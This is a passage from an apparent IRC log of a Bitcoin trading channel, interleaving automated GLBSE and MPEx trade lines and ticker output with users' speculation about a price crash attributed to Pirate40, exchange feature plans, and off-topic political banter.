at it this way Aug 19 20:15:39 How much is an mhash worth Aug 19 20:15:49 [GLBSE] [CIUCIU.BOND] 95 @ 0.1 = 9.5 BTC [+] Aug 19 20:15:57 Is an mhash worth... 0.1 bitcoins? or 0.25? or 0.01? Aug 19 20:16:09 what's mhash to do with anything ? Aug 19 20:16:10 [GLBSE] [BTCMC] 2 @ 0.3899 = 0.7798 BTC [-] Aug 19 20:16:23 income Aug 19 20:16:37 He's valuing his assets based on the income they draw compared to other mining assets. Aug 19 20:16:59 so he got 20k btc, bought assets, and their present value took a 95% hosing Aug 19 20:17:03 due to the mhash value moving ? Aug 19 20:17:08 seems dubious, diff didn't move that much Aug 19 20:18:00 That isn't what happened Aug 19 20:18:20 I'd explain it but I am kind of busy, essentially it's a trade inorder to add mhash per share Aug 19 20:18:33 If the market then values it at 0.05 per share, that implies gigamining should also be 0.05 per share Aug 19 20:18:43 well it's not a big deal, mostly my curiosity. Aug 19 20:18:47 That pretty much sums up the state of the market right now Aug 19 20:26:26 [GLBSE] [TYGRR.BOND-P] 1 @ 0.762 BTC [-] Aug 19 20:26:27 [GLBSE] [TYGRR.BOND-P] 4 @ 0.761199 = 3.0448 BTC [-] Aug 19 20:26:29 [GLBSE] [TYGRR.BOND-P] 4 @ 0.76111 = 3.0444 BTC [-] Aug 19 20:26:30 [GLBSE] [TYGRR.BOND-P] 20 @ 0.761 = 15.22 BTC [-] Aug 19 20:30:29 [GLBSE] [ASICMINER] 5 @ 0.1049 = 0.5245 BTC [+] Aug 19 20:30:31 [GLBSE] [ASICMINER] 695 @ 0.105 = 72.975 BTC [+] Aug 19 20:30:36 [MPEX] [O.BTCUSD.C060N] 1 @ 0.54592957 BTC [-] Aug 19 20:32:21 [MPEX] [S.MPOE] 15059 @ 0.00038355 = 5.7759 BTC [-] Aug 19 20:32:23 [MPEX] [S.MPOE] 9041 @ 0.00037892 = 3.4258 BTC [-] Aug 19 20:32:35 [GLBSE] [YABMC] 15 @ 0.1236 = 1.854 BTC [+] Aug 19 20:33:03 [GLBSE] [ASICMINER] 50 @ 0.105 = 5.25 BTC [+] Aug 19 20:34:29 [GLBSE] [ASICMINER] 5 @ 0.105 = 0.525 BTC [+] Aug 19 20:34:37 [MPEX] [F.GIGA.ETF] 2000 @ 0.00092602 = 1.852 BTC [+] Aug 19 20:34:38 [MPEX] [F.GIGA.ETF] 15400 @ 0.00093205 = 14.3536 BTC [+] Aug 19 20:38:00 anyone want ASICMINER shares? ^^ Aug 19 20:38:37 for free? Aug 19 20:38:58 You can get one for free because you are so awesome ;) Aug 19 20:39:16 lol Aug 19 20:39:23 like free crackers Aug 19 20:39:36 and salt in mcdonnalds Aug 19 20:40:12 [GLBSE] [YARR] 52 @ 0.985 = 51.22 BTC [-] Aug 19 20:40:13 [GLBSE] [YARR] 31 @ 1 = 31 BTC [+] Aug 19 20:40:14 [GLBSE] [YARR] 7 @ 1 = 7 BTC [+] Aug 19 20:40:42 [GLBSE] [YARR] 4 @ 1 = 4 BTC [+] Aug 19 20:40:56 [GLBSE] [GIGAMINING] 3 @ 1.0396 = 3.1188 BTC [+] Aug 19 20:41:44 lol Aug 19 20:41:59 DeaDTerra: I want them all, and I cant afooorrdd theeeemmmmmmmmmmmmm Aug 19 20:42:00 :< Aug 19 20:43:09 WHAT you have free crackers and salt in your McDonalds :( Aug 19 20:43:19 We don't have anything free here in Sweden xD Aug 19 20:43:27 lol Aug 19 20:43:29 you have mcdonalds in sweden? Aug 19 20:43:32 we have free salt Aug 19 20:43:35 ofc they do Aug 19 20:43:35 what do they serve, cans of rotten fish? Aug 19 20:43:36 even finland does Aug 19 20:43:42 free straws Aug 19 20:43:43 except education,hospitals,libararies etc xD Aug 19 20:43:46 that is not much selling but yeah Aug 19 20:43:57 Haha ofc we do everyone has McDonalds Aug 19 20:44:06 do they have mcpickled herring ? Aug 19 20:44:17 ha ha I beat mircea_popescu to the joke Aug 19 20:44:26 ya but i did it better :D Aug 19 20:44:53 also, I hate google Aug 19 20:44:56 btw http://www.youtube.com/watch?v=U3z0zh8kow4 Aug 19 20:45:03 http://www.googleventures.com/ Aug 19 20:45:08 this is how a website should look Aug 19 20:45:26 although they need to use heavier sans for the text on the image Aug 19 20:45:29 100 is too light Aug 19 20:46:41 [MPEX] [O.BTCUSD.P080T] 2 @ 0.01542078 = 0.0308 BTC [+] Aug 19 20:53:09 [GLBSE] [YABMC] 20 @ 0.1237 = 2.474 BTC [+] Aug 19 20:53:10 [GLBSE] [YABMC] 14 @ 0.1238 = 1.7332 BTC [+] Aug 19 20:53:30 [MPEX] [S.MPOE] 1400 @ 0.00037892 = 0.5305 BTC [-] Aug 19 20:53:51 ;;ticker Aug 19 20:53:51 Best bid: 8.525, Best ask: 8.53099, Bid-ask spread: 0.00599, Last trade: 8.53099, 24 hour volume: 162175, 24 hour low: 8.5102, 24 hour high: 12 Aug 19 20:54:41 [GLBSE] [GIGAMINING] 1 @ 0.931 BTC [-] Aug 19 20:54:43 [GLBSE] [GIGAMINING] 4 @ 0.9301 = 3.7204 BTC [-] Aug 19 20:54:44 [GLBSE] [GIGAMINING] 15 @ 0.93 = 13.95 BTC [-] Aug 19 20:55:11 whoa Aug 19 20:55:30 whole new level. Aug 19 20:56:15 Pirate is selling off to afford to pay back all his lenders is my guess Aug 19 20:56:22 he owes in btc. Aug 19 20:56:25 OBSI.HRPT askwall going up in a few minutes Aug 19 20:56:33 [GLBSE] [GIGAMINING] 28 @ 1.0396 = 29.1088 BTC [+] Aug 19 20:56:35 [GLBSE] [GIGAMINING] 1 @ 1.03989 BTC [+] Aug 19 20:56:36 [GLBSE] [GIGAMINING] 2 @ 1.04 = 2.08 BTC [+] Aug 19 20:56:42 i don't see why anyone would accept usd prices tomorrow. Aug 19 20:56:46 [GLBSE] [GIGAMINING] 60 @ 0.93 = 55.8 BTC [-] Aug 19 20:57:17 [GLBSE] [OBSI.HRPT] 9 @ 0.1 = 0.9 BTC [+] Aug 19 20:57:19 [GLBSE] [OBSI.HRPT] 1 @ 0.1 BTC [+] Aug 19 20:59:46 ;;bc,stats Aug 19 20:59:48 Current Blocks: 194661 | Current Difficulty: 2190865.9701029 | Next Difficulty At Block: 195551 | Next Difficulty In: 890 blocks | Next Difficulty In About: 5 days, 17 hours, 57 minutes, and 0 seconds | Next Difficulty Estimate: 2363427.53531723 | Estimated Percent Change: 7.87640903502 Aug 19 21:00:59 [MPEX] [O.BTCUSD.C100N] 1 @ 0.25736594 BTC [-] Aug 19 21:01:03 certainly if i was owed 1000 btc i wouldn't take 9000 usd for it or w/e Aug 19 21:01:07 [MPEX] [S.MPOE] 3389 @ 0.00037892 = 1.2842 BTC [-] Aug 19 21:01:09 [MPEX] [S.MPOE] 1520 @ 0.00036581 = 0.556 BTC [-] Aug 19 21:01:09 [MPEX] [S.MPOE] 49000 @ 0.00036411 = 17.8414 BTC [-] Aug 19 21:01:10 [MPEX] [S.MPOE] 11811 @ 0.00036299 = 4.2873 BTC [-] Aug 19 21:03:02 [GLBSE] [SS] 4 @ 1.8 = 7.2 BTC [+] Aug 19 21:04:17 anybody know if asicminer converted anything to fiat yet? Aug 19 21:05:03 [GLBSE] [ASICMINER] 15 @ 0.1001 = 1.5015 BTC [-] Aug 19 21:05:05 [GLBSE] [ASICMINER] 5 @ 0.1 = 0.5 BTC [-] Aug 19 21:09:07 [GLBSE] [FOO.PPPPT] 2 @ 0.6403 = 1.2806 BTC [+] Aug 19 21:10:48 [GLBSE] [YARR] 2 @ 0.90111011 = 1.8022 BTC [-] Aug 19 21:10:49 [GLBSE] [YARR] 7 @ 0.9011 = 6.3077 BTC [-] Aug 19 21:11:08 [GLBSE] [FOO.PPPPT] 8 @ 0.6403 = 5.1224 BTC [+] Aug 19 21:11:30 [GLBSE] [FOO.PPPPT] 10 @ 0.6404 = 6.404 BTC [+] Aug 19 21:12:17 [GLBSE] [YARR] 2 @ 1 = 2 BTC [+] Aug 19 21:30:23 [MPEX] [O.BTCUSD.C120N] 4 @ 0.17573959 = 0.703 BTC [-] Aug 19 21:35:45 ;;ticker Aug 19 21:35:46 Best bid: 7.75578, Best ask: 7.8, Bid-ask spread: 0.04422, Last trade: 7.75578, 24 hour volume: 187583, 24 hour low: 7.75578, 24 hour high: 12 Aug 19 21:36:50 Curse pirate Aug 19 21:36:55 He has no respect Aug 19 21:37:19 We were enjoying double digits. He couldn't even keep us over $10. Aug 19 21:38:23 ;;ticker Aug 19 21:38:24 Best bid: 7.69999, Best ask: 7.7, Bid-ask spread: 0.00001, Last trade: 7.7, 24 hour volume: 190274, 24 hour low: 7.6555, 24 hour high: 12 Aug 19 21:38:32 he should wlk the plank Aug 19 21:38:34 or better et Aug 19 21:38:35 whoa nelly. Aug 19 21:38:37 yet Aug 19 21:39:07 tied to a rack of miners and made uncomfortably warm for a period of time Aug 19 21:39:49 [GLBSE] [BTCWEB] 7 @ 0.04 = 0.28 BTC [-] Aug 19 21:40:53 [MPEX] [O.BTCUSD.C090N] 1 @ 0.29448078 BTC [-] Aug 19 21:41:03 [GLBSE] [YABMC] 4 @ 0.125 = 0.5 BTC [+] Aug 19 21:41:33 I think my theory was correct. Aug 19 21:42:00 I speculated a couple of weeks ago that pirate would dump the price to then buy back all the coins he owed investors, that way he could pay back everyone and still make a really good profit in USD: Aug 19 21:42:03 USD.* Aug 19 21:42:28 DeaDTerra: I tried explaining that to the Europeans this morning but they pissed on me and called me an idiot. Aug 19 21:42:32 Like most Europeans do. Aug 19 21:42:36 [GLBSE] [NASTY] 2 @ 0.779 = 1.558 BTC [-] Aug 19 21:45:15 [GLBSE] [YABMC] 431 @ 0.125 = 53.875 BTC [+] Aug 19 21:46:50 ;;ticker Aug 19 21:46:50 Best bid: 7.79698, Best ask: 7.79938, Bid-ask spread: 0.00240, Last trade: 7.79938, 24 hour volume: 194069, 24 hour low: 7.58, 24 hour high: 12 Aug 19 21:47:04 8.5 for a moment there Aug 19 21:47:20 [GLBSE] [YABMC] 51 @ 0.1295 = 6.6045 BTC [+] Aug 19 21:47:27 [GLBSE] [COGNITIVE] 2 @ 0.67949999 = 1.359 BTC [-] Aug 19 21:47:56 ;;ticker Aug 19 21:47:56 Best bid: 8.2124, Best ask: 8.22628, Bid-ask spread: 0.01388, Last trade: 8.2124, 24 hour volume: 193873, 24 hour low: 7.58, 24 hour high: 12 Aug 19 21:48:02 popped back ya Aug 19 21:48:23 mircea_popescu: how much interest does MPEx pay on deposits again? Aug 19 21:48:38 Azelphur it got suspended beginning of current month. Aug 19 21:48:43 aw. Aug 19 21:48:49 so currently nothing. might come back tho. Aug 19 21:48:55 hehe Aug 19 21:49:09 gotta find new home(s) for my BS&T funds :P Aug 19 21:49:16 Nothing is sacred to Pirate. He would sell his wife if he could buy her back at a lower price. Aug 19 21:49:35 haha Aug 19 21:49:42 [MPEX] [S.MPOE] 2100 @ 0.00038366 = 0.8057 BTC [+] Aug 19 21:50:03 Azelphur stay tuned, i think i'll have one hell of an announcement. Aug 19 21:50:23 nice Aug 19 21:50:56 ;;ticker Aug 19 21:50:57 Best bid: 8.00644, Best ask: 8.01, Bid-ask spread: 0.00356, Last trade: 8.01, 24 hour volume: 194487, 24 hour low: 7.58, 24 hour high: 12 Aug 19 21:55:44 lol 40% drop Aug 19 21:55:51 thats insane Aug 19 21:56:06 usagi: Tell me again how this is not Pirate collecting Bitcoins for his investors. Aug 19 21:56:59 as long as he pays back - we dont care Aug 19 21:57:09 it will rise from the ashes as before Aug 19 21:57:40 Well, its a big piss on the confidence of the whole ecosystem. We're going to lose merchants over this. Aug 19 21:58:07 what merchants ;) Aug 19 21:58:22 Well, we are not losing Silk Road. Aug 19 21:58:25 So, whatever Aug 19 21:58:45 Most merchants convert to $ on the spot Aug 19 21:58:49 bitpay and such Aug 19 21:59:04 I hope you guys enjoy your USD and Euros that are going to be worthless paper in a year or so. Lord Rothschild already bought a huge Euro short. Aug 19 21:59:05 bitpay might have taken a blow Aug 19 21:59:34 Bitpay tends to be conservative Aug 19 21:59:40 I think they might be fine. Aug 19 21:59:42 You giving a year?? I thought much less Aug 19 21:59:51 It's probably less. Aug 19 22:00:14 It gives me some smug satisfaction thinking about pirate holding mostly USD after this. Aug 19 22:00:18 I doubt he is a gold bug. Aug 19 22:00:19 Maybe till the spring... Aug 19 22:01:06 I really don't like Gold, I think the world deserves a better store of value especially when Central Bankers own most of it. Aug 19 22:01:14 I was hoping Bitcoin could be it Aug 19 22:01:24 but it won't be for a while. Aug 19 22:01:57 only problem with bitcoin is sombody could pull the plug Aug 19 22:02:05 cant really happen with gold Aug 19 22:02:36 Well, you can pull the plug on Bitcoin as you can confiscate gold. Aug 19 22:02:48 When you pull the plug, you have to capture datacenters. Aug 19 22:02:58 Tear down infrastructure. Aug 19 22:03:10 To me, that's harder to do than stealing people's gold outright. Aug 19 22:03:16 thats why obama will have a big red button Aug 19 22:03:19 [MPEX] [F.GIGA.ETF] 5142 @ 0.00092454 = 4.754 BTC [-] Aug 19 22:03:36 to stop "cyber attack" Aug 19 22:03:39 farfi, he can overcome the lobbyists of Google and independent ISPs Aug 19 22:03:42 if* Aug 19 22:03:56 The government controls Comcast Aug 19 22:04:03 AT&T Aug 19 22:04:06 but that's about as far as it goes Aug 19 22:04:16 that you know Aug 19 22:04:48 The Globalists hate the internet and they want it under UN control Aug 19 22:05:00 Depending if they succeed will tell if Bitcoin succeeds or not. Aug 19 22:05:08 sounds right Aug 19 22:05:53 this used to be a channel about investing etc. Now it has turned in to a tinfoil ass-hats parade Aug 19 22:06:16 Global policy affects investments Aug 19 22:06:17 we were waiting for you Aug 19 22:06:28 and Diablo Aug 19 22:06:30 and the UN does want to regulate the internet. Aug 19 22:07:13 and obama has a big red button Aug 19 22:07:17 :) Aug 19 22:07:58 I am not so sure yet. I think some private telecomm industry has power. Aug 19 22:09:47 [GLBSE] [FOO.PPPPT] 5 @ 0.8 = 4 BTC [+] Aug 19 22:17:13 [MPEX] [S.MPOE] 8400 @ 0.00038032 = 3.1947 BTC [-] Aug 19 22:17:14 [MPEX] [S.MPOE] 5200 @ 0.00036337 = 1.8895 BTC [-] Aug 19 22:17:16 [MPEX] [S.MPOE] 10800 @ 0.00036306 = 3.921 BTC [-] Aug 19 22:17:17 [MPEX] [S.MPOE] 4344 @ 0.00036299 = 1.5768 BTC [-] Aug 19 22:17:18 [MPEX] [S.MPOE] 11900 @ 0.00036117 = 4.2979 BTC [-] Aug 19 22:17:19 [MPEX] [S.MPOE] 11700 @ 0.00036038 = 4.2164 BTC [-] Aug 19 22:17:19 [MPEX] [S.MPOE] 12356 @ 0.00035965 = 4.4438 BTC [-] Aug 19 22:20:40 [MPEX] [F.GIGA.ETF] 5143 @ 0.00090228 = 4.6404 BTC [-] Aug 19 22:21:34 [GLBSE] [ASICMINER] 7 @ 0.1 = 0.7 BTC [-] Aug 19 22:23:27 [GLBSE] [DMC] 4 @ 0.049 = 0.196 BTC [-] Aug 19 22:24:10 [MPEX] [F.GIGA.ETF] 457 @ 0.00090228 = 0.4123 BTC [-] Aug 19 22:24:52 [GLBSE] [ASICMINER] 250 @ 0.1 = 25 BTC [-] Aug 19 22:27:45 [MPEX] [F.GIGA.ETF] 15804 @ 0.00091877 = 14.5202 BTC [+] Aug 19 22:31:32 [MPEX] [O.BTCUSD.P080T] 40 @ 0.05258451 = 2.1034 BTC [+] Aug 19 22:31:56 [GLBSE] [YABMC] 2 @ 0.13 = 0.26 BTC [+] Aug 19 22:31:57 [GLBSE] [YABMC] 16 @ 0.13 = 2.08 BTC [+] Aug 19 22:32:39 [GLBSE] [TYGRR.BOND-PI] 5 @ 0.951 = 4.755 BTC [+] Aug 19 22:32:41 [GLBSE] [TYGRR.BOND-PI] 45 @ 0.95 = 42.75 BTC [-] Aug 19 22:37:05 [GLBSE] [FOO.PPPPT] 6 @ 0.7999 = 4.7994 BTC [-] Aug 19 22:37:36 [GLBSE] [TYGRR.BOND-P] 4 @ 0.9199 = 3.6796 BTC [+] Aug 19 22:40:45 [MPEX] [S.MPOE] 44198 @ 0.00035965 = 15.8958 BTC [-] Aug 19 22:40:47 [MPEX] [S.MPOE] 13302 @ 0.0003563 = 4.7395 BTC [-] Aug 19 22:41:15 [GLBSE] [NASTY] 1 @ 0.545 BTC [-] Aug 19 22:41:16 [GLBSE] [NASTY] 1 @ 0.5100001 BTC [-] Aug 19 22:41:17 [GLBSE] [NASTY] 4 @ 0.51000001 = 2.04 BTC [-] Aug 19 22:51:11 [GLBSE] [NYAN.C] 5 @ 0.9859 = 4.9295 BTC [-] Aug 19 22:51:13 [GLBSE] [NYAN.C] 16 @ 0.986 = 15.776 BTC [+] Aug 19 22:52:51 ;;ticker Aug 19 22:52:52 Best bid: 7.83998, Best ask: 7.83999, Bid-ask spread: 0.00001, Last trade: 7.83999, 24 hour volume: 203553, 24 hour low: 7.58, 24 hour high: 12 Aug 19 22:55:47 [GLBSE] [SILVER] 2 @ 0.00999999 = 0.02 BTC [+] Aug 19 22:56:37 I am going to laugh when Pirate pays out and the Bitcoins he pays will only be worth a nickel a piece. Aug 19 22:56:53 [GLBSE] [TYGRR.BOND-P] 1 @ 0.80001 BTC [-] Aug 19 22:57:00 that'd be brilliant Aug 19 22:57:13 haha Aug 19 22:57:37 Well if people keep them and wait... Aug 19 22:58:07 EmanuelDeOrtego: do you really think that he is the only one who has USD or BTC? Aug 19 22:58:43 The man has over 500,000 Bitcoins. I've seen the wallets. Aug 19 22:58:50 Of course I don't think he has it all. Aug 19 22:59:01 and only one who cares at what BTC is priced at? Aug 19 22:59:09 I have seen.... wallets burning.... off the shoulder of orion.... Aug 19 22:59:15 There is only 50k in Bitcoins down to less than a dollar. Aug 19 22:59:27 The markets dictate the price and the markets can be easily crashed by him. Aug 19 23:00:01 have you done the math to be sure it is actually a good idea? Aug 19 23:00:22 ;;bids 1 Aug 19 23:00:22 Error: Failure to retrieve order book data. Try again later. Aug 19 23:00:58 EskimoBob: I don't doubt it if you sell first before others panic. Aug 19 23:01:20 do the math and then doubt or do not Aug 19 23:02:05 I really wonder what your preferred reality is and how it would benefit you. Aug 19 23:04:10 you are just guessing out loud and typing "what ever spit brings up on your tongue" so to say Aug 19 23:04:40 just for fun, do the math and find out Aug 19 23:05:11 200,000 Bitcoins in volume. Above average on a common day of trading. Bitcoins don't just pop out of the grave one day. Aug 19 23:05:25 Who could put 100,000 Bitcoins on a exchange at ease? Aug 19 23:05:25 guessing again? Aug 19 23:05:27 that is a lot of red Aug 19 23:05:56 There's nothing empirical here, Bob. We can only guess based on our perceived reality. Just because its speculation doesn't mean its false. Aug 19 23:06:00 hola nefario. Any news on site update? Aug 19 23:06:17 nor is it true EmanuelDeOrtego Aug 19 23:06:17 [MPEX] [S.MPOE] 8210 @ 0.00038366 = 3.1498 BTC [+] Aug 19 23:06:24 I'm expecting to have a demo version of charts later today (for me to play with) Aug 19 23:06:45 why do GLBSE deposits sometimes take >8 confirms? Aug 19 23:06:51 Should speet the fuck up Aug 19 23:06:54 speed Aug 19 23:07:02 forget the charts man :) we need fast loading pages and responsive API for price data Aug 19 23:07:07 EskimoBob: The probability of either side can be quantified. Aug 19 23:07:07 Obsi: thats secret info Aug 19 23:07:33 EskimoBob: it's all part of the same thing, charts and API is being moved off server Aug 19 23:07:42 thats whats slowing everything Aug 19 23:07:46 Obsi: dividendses. Aug 19 23:07:57 waiting for depositses Aug 19 23:08:13 OK, take 500K BTC at price 3 days ago... jst amuse yourself with numbers and then start the guessing game Aug 19 23:08:30 nefario: OK ,sounds good Aug 19 23:08:54 will also be rid of reserve for BTC Aug 19 23:08:57 tomorrow sometime Aug 19 23:09:22 get rid of reserve? Aug 19 23:09:36 EskimoBob: I never said he would sell all his BTC. His goal is only to acquire the rest of the BTC he needs at a lower price. Aug 19 23:09:54 EmanuelDeOrtego: you see, pointless hyperbole is waste of time Aug 19 23:10:05 You're not obligated to acknowledge me you know. Aug 19 23:10:20 "obligated to acknowledge"? Aug 19 23:10:34 You're European aren't you? Aug 19 23:10:53 EmanuelDeOrtego: you're American aren't you? Aug 19 23:11:06 there's 500million europeanas Aug 19 23:11:24 and they don't all belong to the same country Aug 19 23:11:30 EmanuelDeOrtego: you are a mexican are you? Aug 19 23:11:31 so you'll probably want to be more specific Aug 19 23:12:07 Well, I am just trying to refer to this culture of his... Aug 19 23:12:18 This antagonistic culture... Aug 19 23:12:25 It could be a complex. Aug 19 23:12:28 It could be fear. Aug 19 23:12:37 and do not forget EU membership will not make anyone automatically European Aug 19 23:12:51 Look I hate the Eurozone as much as anyone. Aug 19 23:13:17 Anyways, I've lost my motivation to defend my original means and ends. Aug 19 23:14:16 dude, all I asked is this: make some simple calculations and find out, will this make financial sense Aug 19 23:15:08 My whole theory relies on pirate needing profitable BTC to pay off his clients. If that is false, so be it. Aug 19 23:15:18 If Pirate is willing to take a loss so be it. Aug 19 23:15:27 European means nothing. There are countries that are 300 KM wide and have a totally different ideas how shit works Aug 19 23:15:57 I am glad. Aug 19 23:16:09 if you want to compare something to USA, for example, the old Soviet Russia or China will do. Aug 19 23:16:10 I hope the countries do maintain their own separate identities. Aug 19 23:16:26 Well, even the US has its own individual state cultures. Aug 19 23:16:39 flag waving lunatics who think they are the centre of everything Aug 19 23:16:58 We are the center of selling our children to the military. Aug 19 23:17:05 We got nothing to be proud of. Aug 19 23:17:05 Can you fly bobby boy? Aug 19 23:17:40 EmanuelDeOrtego: I thing jews in israel are ahead of you on this militari/children shit Aug 19 23:18:03 Well, the US backs Israel with a lot of money. Aug 19 23:18:14 There are talks about making Israel a state. Aug 19 23:18:29 and the religious eat it up. Aug 19 23:18:46 LOL you guys are fucked more than EU :) Aug 19 23:19:07 Yes, indeed, in some ways. Aug 19 23:19:37 come to think of it... in what way you are not? Aug 19 23:19:52 Depends on your views of the second amendment. Aug 19 23:20:37 oh really? what has arms to do with it? Aug 19 23:21:08 shit, do I know US constitution? ... Aug 19 23:21:11 If our government gets really bad, we can and probably will take arms against it. Aug 19 23:21:11 vomit Aug 19 23:21:35 WHY IS THE PRICE DROPPING LIKE A STONE!!!!! Aug 19 23:21:37 probably most americans have no idea whats even written there Aug 19 23:21:40 There's a reason why the government is hesistant to classify most local militias as domestic terrorism in mainstream media. Aug 19 23:21:52 If they did, they could start a civil war. Aug 19 23:21:55 nefario: no idea but this looks really ugly Aug 19 23:22:04 nefario: EmanuelDeOrtego thinks its Pirate40 Aug 19 23:22:15 I am 80% sure. Aug 19 23:22:29 whats the other 20% for? Aug 19 23:22:50 Just people panicing over Pirate closing down alone Aug 19 23:22:56 one guy, with 500K BTC wants hes holdings to be worth 40% what it was 2 days ago Aug 19 23:22:57 plus non-dedicated traders Aug 19 23:23:10 EskimoBob: They aren't his holding Aug 19 23:23:11 and all the bots going mad Aug 19 23:23:14 [MPEX] [F.GIGA.ETF] 2500 @ 0.00093205 = 2.3301 BTC [+] Aug 19 23:23:15 They are his investors Aug 19 23:23:16 [MPEX] [F.GIGA.ETF] 9204 @ 0.00093319 = 8.5891 BTC [+] Aug 19 23:23:43 I won't be allowing anything like the pirate passthroughs on GLBSE in the future Aug 19 23:23:52 "EmanuelDeOrtego | They are his investors " - I remember some blaa blaa about bullets and dark net ... Aug 19 23:23:53 cause too much damage after the fact Aug 19 23:23:55 lol Aug 19 23:24:12 nefario: Thank you. Aug 19 23:24:31 not for you Aug 19 23:24:33 for GLBSE Aug 19 23:24:40 and BTC in general Aug 19 23:24:45 yes Aug 19 23:24:46 serious price swings are bad Aug 19 23:24:57 make it hard to plan Aug 19 23:25:03 nobody will ever take it seriously for business Aug 19 23:25:36 btc is a way to transfer funds from A - B Aug 19 23:25:42 I'm going to be adding options to GLBSE as a beta by the end of the week Aug 19 23:26:07 and then finding FIAT partners to have currencies traded Aug 19 23:26:14 if you cannot be sure what is the exch rate... no use for it at all Aug 19 23:26:34 nefario: You're the man. Aug 19 23:26:57 I spent an hour yesterday working out how to add futures Aug 19 23:27:04 turns out to be pretty easy Aug 19 23:27:10 also will get loans as a bonus Aug 19 23:27:20 but they'll need a little more work Aug 19 23:27:25 I won't be allowing anything like the pirate passthroughs on GLBSE in the future << this is wise. Aug 19 23:27:25 11 confirms still no deposit in GLBSE Aug 19 23:27:31 shoul;dn't have been allowed in the first place. Aug 19 23:27:49 Obsi, the process is run as a batch job Aug 19 23:27:53 [GLBSE] [OBSI.HRPT] 9 @ 0.1 = 0.9 BTC [+] Aug 19 23:28:16 once per hour? Aug 19 23:28:26 every 24h Aug 19 23:28:49 and 3 times every hour before and after Aug 19 23:28:49 lol Aug 19 23:28:56 a couple of times an hour Aug 19 23:28:59 nefario: it is also a nice source of additional revenue to support options. Aug 19 23:29:14 Options will bring stability to the market Aug 19 23:29:22 It may be a stability of $1 a Bitcoin Aug 19 23:29:23 thats what I'm hoping Aug 19 23:29:23 but still Aug 19 23:29:33 more stability and more revenue Aug 19 23:29:58 who wait Aug 19 23:29:58 We're back over 8 Aug 19 23:29:59 I did try to explain this to mircea_popescu too but he refused to listen and I got tired Aug 19 23:30:00 I said futures Aug 19 23:30:05 I meant to say optoins Aug 19 23:30:15 They can be the same in some cases Aug 19 23:30:33 kind of but not really Aug 19 23:30:35 nefario: you can also do short selling etc Aug 19 23:30:37 Anyways, my money is stuck in POLY.10.1 until the price goes over 10 gain. Aug 19 23:30:46 again* Aug 19 23:30:48 EskimoBob: thats a sub catagory of lending Aug 19 23:30:52 which will be added Aug 19 23:31:15 and let people write options - take your cut Aug 19 23:31:34 good old puts and calls writing Aug 19 23:32:35 Meni Rosenfield is just laughing it up right now I bet. Aug 19 23:33:09 because? Aug 19 23:33:33 [GLBSE] [TYGRR.BOND-P] 5 @ 0.88 = 4.4 BTC [+] Aug 19 23:34:08 He didn't have to buy my bonds at face value when BTC was at $15 Aug 19 23:35:29 [GLBSE] [ASICMINER] 3 @ 0.095 = 0.285 BTC [-] Aug 19 23:35:30 [GLBSE] [ASICMINER] 15 @ 0.0946 = 1.419 BTC [-] Aug 19 23:35:31 [GLBSE] [ASICMINER] 50 @ 0.09400001 = 4.7 BTC [-] Aug 19 23:35:32 [GLBSE] [ASICMINER] 100 @ 0.094 = 9.4 BTC [-] Aug 19 23:35:34 [GLBSE] [ASICMINER] 5 @ 0.093 = 0.465 BTC [-] Aug 19 23:35:35 [GLBSE] [ASICMINER] 13 @ 0.092 = 1.196 BTC [-] Aug 19 23:35:36 [GLBSE] [ASICMINER] 23 @ 0.09 = 2.07 BTC [-] Aug 19 23:36:13 lol, now they are dumping this like there is no tomorrow Aug 19 23:36:50 That was me so I can pay coupons since deposits don't work apparently Aug 19 23:37:58 obsi : did you click the little "check now" thing ? Aug 19 23:38:08 only about 50 times Aug 19 23:38:17 EskimoBob: https://bitcointalk.org/index.php?PHPSESSID=b5440c4ba3a416b888df055ed8a265b5&topic=101748.msg1113844#msg1113844 Aug 19 23:38:30 that sucks. Aug 19 23:39:08 DiabloD3: coupons paid Aug 19 23:39:35 Obsi: send shares to Obsi:ABMO? Aug 19 23:39:47 Obsi:OBSI.ABMO Aug 19 23:40:32 er right Aug 19 23:40:49 now we must pray to the tablet god Aug 19 23:42:21 [GLBSE] [TEEK.USD] 10 @ 0.0899 = 0.899 BTC [+] Aug 19 23:42:27 GLBSE Aug 19 23:42:28 IT IS SO SLOW Aug 19 23:42:33 WHY IS IT SO SLOW Aug 19 23:42:41 to anoy you Aug 19 23:42:45 specifically you Aug 19 23:42:52 _I KNEW IT_ Aug 19 23:42:56 Doing a great job nefario, keep up the good work. Aug 19 23:42:59 EmanuelDeOrtego: interesting read but this keynesian crap has to go out of the window soon (few comments below) Aug 19 23:42:59 no the real answer is the servers busy doing something Aug 19 23:43:15 On the annoying DiabloD3 part anyhow. Aug 19 23:43:20 :) Aug 19 23:43:22 Obsi: sent Aug 19 23:43:41 Heh let's see what this is Aug 19 23:44:00 [GLBSE] [OBSI.HRPT] 2 @ 0.1 = 0.2 BTC [+] Aug 19 23:44:04 [MPEX] [S.MPOE] 42400 @ 0.00036149 = 15.3272 BTC [-] Aug 19 23:44:04 [MPEX] [S.MPOE] 23539 @ 0.00035667 = 8.3957 BTC [-] Aug 19 23:44:26 [GLBSE] [BTC-MINING] 15 @ 0.99991 = 14.9987 BTC [+] Aug 19 23:44:27 DiabloD3: username to send to? Aug 19 23:44:42 Diablo-D3:DMC Aug 19 23:45:00 but they get to the same point I was hoping EmanuelDeOrtego will discover after the mat exercise :) Aug 19 23:45:39 [GLBSE] [YABMC] 10 @ 0.13 = 1.3 BTC [+] Aug 19 23:45:45 pole love to forget that if you sell like a mad, every sale will bring in less and less coin Aug 19 23:45:47 "It won't end just like that. In summer of 2013 the price will rally all the way back up to $7.50 or so and then crash. In 2014 the price will rally all the way back to $3.75 and then crash. 2015 will see a strong rally back to $1.87 followed by a crash and a healthy 2016 rally back to $0.93." Aug 19 23:45:48 Oh god Aug 19 23:45:50 My sides Aug 19 23:46:22 why not just jump out of the window right now? Aug 19 23:46:38 DON'TMINDIFIDO! Aug 19 23:46:57 do not forget to scream: yipikayee mother fuckers Aug 19 23:47:00 DiabloD3: sent Aug 19 23:47:16 DMC mh/share is now 5.318 Aug 19 23:47:39 5.318 Mh/s = 1 Mh/s 2 weeks ago ? Aug 19 23:47:39 [GLBSE] [DMC] 1 @ 0.054 BTC [+] Aug 19 23:47:50 EskimoBob: yup Aug 19 23:47:59 [GLBSE] [BMMO] 10 @ 0.0798 = 0.798 BTC [+] Aug 19 23:48:14 Mh/s gets devalued too fast to use it as a indication of anything Aug 19 23:48:50 [GLBSE] [YABMC] 5 @ 0.13 = 0.65 BTC [+] Aug 19 23:48:50 EskimoBob: yeah, but I did nothing for that Aug 19 23:48:51 it's like Italian lira or Greek dinari? they had 